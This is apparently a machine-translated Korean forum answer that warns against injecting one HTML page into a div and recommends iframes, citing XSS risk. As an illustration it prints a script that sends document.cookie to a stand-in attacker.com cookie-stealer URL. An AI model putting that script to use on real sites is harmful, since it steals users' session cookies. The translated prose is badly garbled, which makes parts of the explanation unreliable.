짧은 답변 : 당신은 할 수 없습니다.
긴 대답 : 어렵지만 오류가 발생하고 보안 위험이 커질 수 있습니다. 그런 다음
<!DOCTYPE html public>
<html>
<head>
<title>My Embedded Page</title>
</head>
<body>
<div id="content">
Something interesting here...
</div>
</body>
</html>
: 여기, 그리고
<!DOCTYPE html public>
<html>
<head>
<title>My Page</title>
</head>
<body>
<div id="embedMe"></div>
</body>
</html>
처음에 포함 할 페이지의 코드 :
은의이 당신이 포함 된 또 다른 하나를하고자하는 페이지입니다 가정 해 봅시다 그것이 포함되어있을 때 :
<!DOCTYPE html public>
<html>
<head>
<title>My Page</title>
</head>
<body>
<div id="embedMe">
<!DOCTYPE html public>
<html>
<head>
<title>My Embedded Page</title>
</head>
<body>
<div id="content">
Something interesting here...
</div>
</body>
</html>
</div>
</body>
</html>
이 문제는 확인할 수 있습니다. 두 개의 html
요소와 두 개의 head
두 개의 body
, 두 개의 title
및 두 개의 DOCTYPES
두 개의 요소가 있습니다. 이것은 호의적 인 예입니다. 공격자가 포함 된 페이지의 URL이 하나에 포함되는 변경할 수 있다고이 :
<script type="text/javascript">
window.location.href = "http://www.attacker.com/cookiestealer.php?cookies=" + document.cookie;
</script>
갑자기는, 사용자가 자신의 계정이 해킹하고, 책임이 sholders에 도착 갖는 불평
. 이것은 XSS의 간단한 예이며, 실제 공격자는 XSS를 훨씬 더 잘 숨길 수 있습니다. 제발, 그냥 iframe을 사용하십시오. 그것이 그들이 만들어진 이유입니다.
겠습니까 정상 프레임이 허용 될이 링크를 시도? 그냥 평범한 div에 보안 위협 (슈퍼 쉬운 XSS (크로스 사이트 스크립팅)) 포즈. – C0deH4cker